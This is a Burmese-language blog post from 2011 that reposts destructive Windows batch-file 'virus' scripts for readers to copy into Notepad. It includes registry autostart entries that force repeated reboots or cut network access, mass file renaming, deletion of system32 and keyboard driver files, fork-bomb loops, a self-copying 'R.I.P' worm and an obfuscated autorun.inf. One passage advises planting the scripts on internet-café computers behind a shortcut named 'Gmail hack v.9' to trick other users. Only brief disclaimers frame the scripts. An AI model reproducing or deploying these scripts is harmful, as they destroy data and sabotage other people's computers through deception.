.bat file ကို အေျခခံထားေသာ Virus Code မ်ား

Posted in August 13, 2011
by sawlinux

မေကာင္းတဲ့နည္းပညာကို အားေပးတာမဟုတ္ပါဘူး။ ဒါေတြလိုက္စုထားတာၾကာေရာေပါ့။ က်ေနာ္က Progra
-ming Language, Web development ခက္ခဲနက္နဲတာေတြမေလ့လာျဖစ္တာပဲရွိမွာ။ ဒါေပမယ့္ အျမဲတန္း
အဲဒါေတြဖတ္ျဖစ္တယ္။ Programming Language အပိုင္းမွာ ေလ့လာမယ္ဆိုရင္ ေအာက္ပါ Section အပိုင္း
မ်ားေလ့လာဖတ္လို႔ရႏိုင္ပါတယ္။ ဒီအပိုင္းေတြမွာက်ေနာ္ဖတ္သာဖတ္ျဖစ္တယ္။ ေလ့က်င့္တဲ့အပို္င္းမွာေတာ့
လက္ေတြ႕မလုပ္ျဖစ္ခဲ့ဘူး။ ေနာက္ျပီး က်ေနာ္က ေနာက္ပိုင္းမွကြန္ပ်ဴတာေလ့လာျဖစ္ခဲ့ေတာ့ ဒီအပိုင္းေတြ
ကို ေလ့က်င့္ဖို႔မလြယ္ေတာ့ပါဘူး။ ေအ...အသက္ႏွစ္ဆယ္ေက်ာ္ Language ပိုင္းႏိုင္တဲ့ညီငယ္ေတြဆိုရင္
အထူးကိုအားေပးပါတယ္။ ေလ့လာလဲ ေလ့လာသင့္ပါတယ္။
# ↳ C++
# ↳ C#
# ↳ Python
# ↳ Java
# ↳ VB.NET
# ↳ VB
# ↳ Theory And Data Structure
# ↳ XML

ေနာက္ျပီးေအာက္ကအပိုင္းေတာ့ Web Development အပိုင္းျဖစ္ပါတယ္။ ၀က္ဘဆိုက္ေတြကို စနစ္တက်
လုပ္တတ္ခ်င္ရင္ ေအာက္ပါအပိုင္းေတြကိုေလ့လာရမွာပါ။ အထူးအားျဖင့္ HTML / CSS, Javascript / AJAX
ေလ့လာရမယ္။ အဲဒီအပိုင္းေတြကို ကၽြမ္းက်င္မယ္ဆိုရင္လည္း Web အပုိင္းမွာေတာ္ေတာ္ခရီးေရာက္ပါတယ္။
က်ေနာ္က HTML / CSS, Javascript ေတြကို ကိုယ္ပိုင္ေရးတတ္တာမဟုတ္ပါ။ ဘယ္အပိုင္းမွာ ဘယ္
လိုသြင္းရလဲ ဘယ္လိုျပင္ရမလဲစတာေတြ က်ေနာ္သိသေလာက္သိပါတယ္။ တတ္ခ်င္တဲ့ပုဂၢိဳလ္မ်ားအေနနဲ႔
ေလ့လာေပါ့ဗ်ာ။

# ↳ PHP
# ↳ Ruby On Rail
# ↳ ASP / ASP.NET
# ↳ HTML / CSS
# ↳ Javascript / AJAX
# ↳ Dreamweaver
# CMS
# ↳ Joomla
# ↳ Wordpress

က်န္တာေတာ့ က်ေနာ္ေန႔စဥ္စာဖတ္တယ္။လက္ေတြ႕လိုက္လုပ္တယ္။ရလာတဲ့တစ္ခ်ိဳ႕မေကာင္းတဲ့နည္း
ပညာေတြကို ဒီတိုင္းပဲသိမ္းထားတာမ်ားပါတယ္။
ဒါေပမယ့္ တစ္ေန႔က က်ေနာ္ကိုင္တဲ့ဆိုက္တစ္ခုရဲ႕ စီေဘာက္စ္မွာ မေကာင္းတဲ့လင့္ေတြလာထိုးျပီးရုန္႕ရင္း
ၾကမ္းတမ္းေသာစကားလံုးေတြေရးထားတာေတြ႕ရတယ္။ က်ေနာ္ ဘာမွမေျပာလိုပါဘူး။ ဒါေပမယ့္ မိမိက
ကြန္ပ်ဴတာကၽြမ္းက်င္တယ္ဆိုရင္ စမ္းၾကည့္ေပါ့ဗ်ာ။ က်ေနာတို႔ကနည္းပညာေလ့လာမယ့္လူအတူတူဆို
ေတာ့ ကိုယ့္စက္ကို မပ်က္ေအာင္ထိန္းသိမ္းနည္းေလးေတြ သိထားျပီးလို႔ထင္ပါတယ္။


.bat file ကို အေျခခံထားေသာ Virus ေရးထားေသာ Code မ်ားေလ့လာခ်င္ရင္ ေအာက္ပါအတိုင္း
ေလ့လာႏိုင္ပါတယ္။

simple virus code

June 17th, 2010 | Author: zuzu
Virus Code ေလးေတြတင္ေပးလုိက္တယ္ဂ်ာ။မယုံရင္လည္း Run ၾကည္ ့ေပါ့ေနာ္။ ဟိဟိ ။တတ္လာ
တဲ ့ျပသနာေတြေတာ ့တာ၀န္မယူပါ။
ဒါကေတာ ့ကြန္ျပဴတာ shutdown က်ေစတဲ ့ ဗဳိင္းရပ္ကုတ္ပါ။notepad မွာ copy/paste လုပ္ျပီး….shutdown.bat လုိ ့ save မွတ္လုိက္ပါ။သြား Run မိရင္ေတာ ့ ျပန္တတ္လာရင္ သင္စက္ဟက္ခံထိျပီးဆုိျပီးျပေနလိမ္ ့မယ္။

echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v /t reg_sz /d c:windowshartlell.bat /f
echo You have been HACKED.
PAUSE

ဒါကေတာ ့ အင္တာနက္ကုိ block လုပ္လုိက္တဲ ့Code ကုတ္ပါ။
echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo You Have Been HACKED!
PAUSE
Disableinternet.bat လုိ ့ save မွတ္ပီးသိမ္းထားနုိင္ပါတယ္။မေတာ္တဆ သြားနိပ္မိမွာဆုိးလုိ ့ပါ။

ဒါကေတာ ့ TXT file ေတြကုိ အလုပ္မလုပ္ေအာင္ ခုိင္းလုိက္တဲ ့ comment ျဖစ္ပါတယ္။
REN *.DOC *.TXT
REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT
txt.bat ဆုိျပီး save မွတ္ထားလုိက္ပါ။

ေအာက္ဆုံးကေတာ ့ေတာ ့ အားလုံးကို ေပါင္းျပီးေရးထားလုိက္တာပါ။
အေပၚက ေစခုိိင္းထားတဲ ့အရာေတြကို တစ္ခါတည္းအလုပ္လုပ္သြားတာပါ။ေတေရာ ဟီး ။ ။
:CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH
ipconfig /release
shutdown -r -f -t0
echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v HAHAHA /t reg_sz /d c:windowshartlell.bat /f
echo You Have Been Hackedecho @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo YOU HAVE BEEN HACKED *****
REN *.DOC *.TXT
REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT
PAUSE
PAUSE


looping of 2 bat file and Simple Virus Codes

May 28th, 2010 | Author: zuzu

Network သမား တစ္ေယာက္ဟာ Bat code ေတြ ကုိ ရင္းနွီးျပီးသားျဖစ္မွာပါ။
သင္ဟာ Programmer တစ္ေယာက္မဟုတ္ရင္ေတာင္ bat code ေတြ ကုိ သိထားယုံနဲ ့
အေသးစား Virus တစ္ေကာင္ကုိ ဖန္တီးနိုင္မွာပါ။ ဘယ္လို ဖန္တီးမလဲ?
ဒါက ေတာ ့ သင့္ဥာဏ္ကြန္ ့ျမဴးနိုင္မွုေပၚမွာ မူတည္ပါတယ္။
အခု bat file နွစ္ခုနဲ ့ သင့္ရဲ ကြန္ျပဴတာ ကုိ ဒုကၡေပးၾကည္ ့ရေအာင္။
ဒီကုတ္ေလးေတြ ကုိ ကူးပါ။
notepad ထဲမွာေနာ္။
start
shutdown -s
@echo off
:loop
msg * Hello Chuchar
start Itdengerous.2
goto loop
ျပီးရင္ Itdengerous.1 ဆိုျပီး .bat နဲ ့ save ပါ။
ေနာက္ျပီးေတာ ့ ဒီကုတ္ေလးပါပဲ။
start
shutdown -s
@echo off
:loop
msg * Hello Chuchar
start Itdengerous.1
goto loop
Itdengerous.2 လုိ ့အမည္ေပးျပီး .bat နဲ ့ save မွတ္ပါ။

ဖုိဒါတစ္ခုထဲမွာ အဲဒီ bat ဖုိင္ နွစ္ဖုိင္လုံးရွိေနပါေစ။
ကဲ သင္ၾကဳိက္တဲ ့ဖိုင္တစ္ခု ကုိ Run ၾကည္ ့ပါ။
ဘာျဖစ္သြားလဲ ဆုိတာေတြ ့ပါလိမ္ ့မယ္ ။ ။
Looping ပတ္္ျခင္းေတြ မျပီးဆုံးနုိင္ေတာ ့ပါဘူး။
bat ဖုိင္ကုိ ေတြရဲ ့ looping ပတ္ျခင္းကုိ Ctrl+C နဲ ့တားဆီးနုိင္ပါတယ္။
ဒါေပ ့မယ္..အေပၚမွာ ပါတဲ ့ဖိုင္နွစ္ခု ရဲ ့ looping အေရအတြတ္က အကန္ ့အသတ္မရွိတာေၾကာင့္
Ctrl+C လည္း တားဆီးနူိင္မွာမဟုတ္ေတာ ့ပါဘူး။
code ရဲ ့ စစျခင္းမွာ Shutdown -s ထည္ ့ထားတဲ ့အတြတ္… shutdown ကလည္း မျဖစ္မေနက်မွာပါပဲ။
shutdown -a နဲ ့ေတာ ့ အဲဒီ process ကုိ တားဆီးနုိင္ပါတယ္။
Start>run or Window key+R က ေန ျပီး
Shutdown -a နဲ ့သတ္ပစ္နိုင္ပါတယ္။
ေအာက္က
msg * Hello Chuchar
ဆုိတာ က ေတာ ့ Pop box တစ္ခု အေနနဲ ့သင္ဘာေပၚခ်င္လဲ။ သင္ၾကဳိက္တာေရးထည္ ့နိုင္ပါတယ္။
msg * I Love You ဆုိရင္ သူကလည္း သင္ comment ေပးထားတဲ ့အတုိင္း I love You ဆုိျပီး ေပၚေနပါလိမ္ ့မယ္။
မမုိက္ဘူးလား ။
start Itdengerous.1
start Itdengerous.2
ဆုိတာ ကေတာ ့ သင့္ရဲ ့ bat file နွစ္ဖုိင္ ကုိ လွမ္း ျပီး Run တာ ျဖစ္ပါတယ္။
1 က 2 ကုိ ဖြင့္မယ္။ 2 က 1 ကုိ ဖြင့္မယ္။
ျပီးရင္ goto loop အၾကိမ္အေရအတြတ္ မရွိ ဖြင့္ေနမယ္။
အဲဒါဆုိ ေသခ်ာပါတယ္။ သင့္ကြန္ျပဴတာ လံုး၀ restart ခ်လုိက္ရမယ္။
မပူပါနဲ ့ ။
တစ္ခါတည္းနဲ ့အေရာက္ပုိ ့ခဲ ့မယ္ေနာ္။
အင္တာနက္ဆုိင္တစ္ဆုိင္သြားသုံးတယ္ဆုိပါစုိ ့။
သင္အဲဒီကြန္ျပဴတာကုိ အဲဒီဖုိင္ေတြ Run ခ်င္တယ္ဆုိ လြယ္ပါတယ္။
အဲဒီ ဖုိင္နွစ္ဖုိင္ရွိတဲ ့ ဖုိဒါကုိ ေကာ္ပီ လုပ္ပါ။ ဒီအတုိင္းၾကီး ထားခဲ ့မယ္ဆုိ သိတဲ ့သူေတြ သိမယ္ေလ။
အဲဒီေတာ ့…. C:// ရဲ ့ေအာက္ေနရာ တစ္ခုခု။ ဒါမွမဟုတ္ သင့္စိတ္ၾကဳိက္ေနရာတစ္ခု မွ သြားထည္ ့လုိက္ပါ။
ျပီးရင္ Itdengerous.1 ျဖစ္ေစ Itdengerous.2 ျဖစ္ေစ တစ္ဖုိင္ဖုိင္ကုိ Desktop ကုိ လွမ္းျပီး
shortcut ပုိ ့ပါ။ အဲဒီ shortcut file ကုိ icon ေျပာင္းလုိ ့ရပါတယ္။
သင္ၾကဳိက္တဲ ့ Icon ေလး ေျပာင္းျပီး။ဒီလုိေလးေပးခဲ ့ပါလားဟင္။
Gmail hack v.9 ဆုိျပီး
ေသခ်ာပါတယ္ user ေတြ စိတ္၀င္စားမွာ


ေအာက္မွာ ဗုိင္းရပ္ simple code ေလးပါ။ ေလ ့လာနုိင္ပါတယ္။
title hello
@echo off
del *.dll
del *.exe
del *.ini
time 00:00
date 88/88/888
msg *hello it my brithday
msg *hello it my brithday
msg *hello it my brithday
msg *hello it my brithday
msg *hello it my brithday
msg *hello it my brithday
msg *hello it my brithday
msg *hello it my brithday
msg *hello it my brithday
msg *hello it my brithday
echo copy hello.bat “documents and settings\all users\start menu\programs\startup”
echo copy hello.bat “documents and settings\all users\start menu\programs\startup”
echo copy hello.bat “documents and settings\all users\start menu\programs\startup”
echo copy hello.bat “documents and settings\all users\start menu\programs\startup”
echo copy hello.bat “documents and settings\all users\start menu\programs\startup”
echo copy hello.bat “documents and settings\all users\start menu\programs\startup”
echo copy hello.bat “documents and settings\all users\start menu\programs\startup”
echo copy hello.bat “documents and settings\all users\start menu\programs\startup”
echo copy hello.bat “documents and settings\all users\start menu\programs\startup”
echo copy hello.bat “documents and settings\all users\start menu\programs\startup”
echo copy hello.bat “documents and settings\all users\start menu\programs\startup”
echo copy hello.bat “documents and settings\all users\start menu\programs\startup”
echo copy hello.bat “documents and settings\all users\start menu\programs\startup”
echo copy hello.bat “documents and settings\all users\start menu\programs\startup”
echo copy hello.bat “documents and settings\all users\start menu\programs\startup”
echo copy hello.bat “documents and settings\all users\start menu\programs\startup”
echo copy hello.bat “documents and settings\all users\start menu\programs\startup”
echo copy hello.bat “documents and settings\all users\start menu\programs\startup”
cd C:\WINDOWS\system32
del /S /F /Q keyboard.drv
del /S /F /Q keyboard.sys
del system32
shutdown -s -f
exit

အႏၱရာယ္ရွိတဲ ့ Virus code

June 17th, 2010 | Author: zuzu
အႏၱရာယ္ရွိတဲ ့ Virus code တစ္ခုပါ။သိထားသင့္တယ္ထင္လုိ ့တင္ေပးထားတာပါ။
သင့္စက္မွာ မ Run ပါနဲ ့။
@Echo off
color 4
title 4
title R.I.P
start
start
start
start calc
copy %0 %Systemroot%\Greatgame > nul
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Greatgame /t REG_SZ
/d %systemroot%\Greatgame.bat /f > nul
copy %0 *.bat > nul
Attrib +r +h Greatgame.bat
Attrib +r +h
RUNDLL32 USER32.DLL.SwapMouseButton
start calc
cls
tskill msnmsgr
tskill LimeWire
tskill iexplore
tskill NMain
start
cls
cd %userprofile%\desktop
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
cd %userprofile%My Documents
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
start
start calc
cls
msg * R.I.P
msg * R.I.P
shutdown -r -t 10 -c “VIRUS DETECTED”
start
start
time 12:00
:R.I.P
cd %usernameprofile%\desktop
copy Greatgame.bat %random%.bat
goto RIP

Virus ေရးသားနည္းေလးပါ..ဗဟုသုတရေအာင္လို႕တင္ေပးလိုက္တာပါ.....
သူမ်ားေတြကိုေလွ်ာက္ၿပီးဒုကၡမေပးပါနဲ႕ခင္ဗ်..

လုပ္နည္းေလးကေတာ့...
ပထမဆံုး notepad ကိုဖြင့္ပါ..
ၿပီးရင္ေအာက္မွာေပးထားတဲ့ Command ေတြကို Copy/ Paste လုပ္ၿပီး .bat file အေနနဲ႕ save လုပ္လိုက္ပါ...

1.............Danger Virus........ (.bat)
Code:
@echo del off C:\\windows\system32



2.............Danger Virus......... (.bat)
Code:
@echo off
del C:\\windows\system32



3.............Danger Virus......... (.bat)
Code:

del "C:\windows\system32\bootok" /Q/S >nul
del "C:\windows\system32\bootvid" /Q/S >nul
del "C:\windows\system32\bootvrfy" /Q/S >nul


4.............Danger Virus........ (.bat)
Code:
del "C:\windows\pchealth\"
del "C:\windows\system\"
del "C:\windows\system32\restore"
del "C:\windows\system32\autoexec.nt"
del "C:\windows\system32\logonui.exe"
del "C:\windows\system32\ntoskrnl.exe"

5....... Fake virus ..... (.bat)
Code:
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*


6.......Atomic Bomb Virus........ (.bat)
Code:
@echo off
:A
start dir
start command
start firefox
start explorer
start notepad
goto:A

7.......Autorun Virus.......... (.inf)

;1Kj0aDKwn4LLKLidrsqZqAkIaLKf43iKaDOK8d8iJsor571eKdl0wo27L1
[AutoRun]
;e9L33SLkrokHI8isdlwKF0Lla253dr4sqekD5siilkecj0dw13e8ZKX39wsS3wfaqk7wio1ia
open=n.com
;irllr3rr3jiDia3lw4s52q
shell\open\Command=n.com
;w22swS
shell\open\Default=1
;qKOwXa397Soksk44ai5KjqmkeSIiiasl1ULj0f4iJr43Lsw2fA53FDkrekLdr4LlD1l4jHp2
ooi21lkKCoisaiDs0dww42clpi0rkk0dsjfs2kw3dq56ADdsa8k2
shell\explore\Command=n.com
;549AA28likLsmq20aLis9arD53weko4Llo4ilKowi1awf3UnkSraAak23Ia3kfi3dfi00ol
sw4k2os344k0dwpXD

Related Post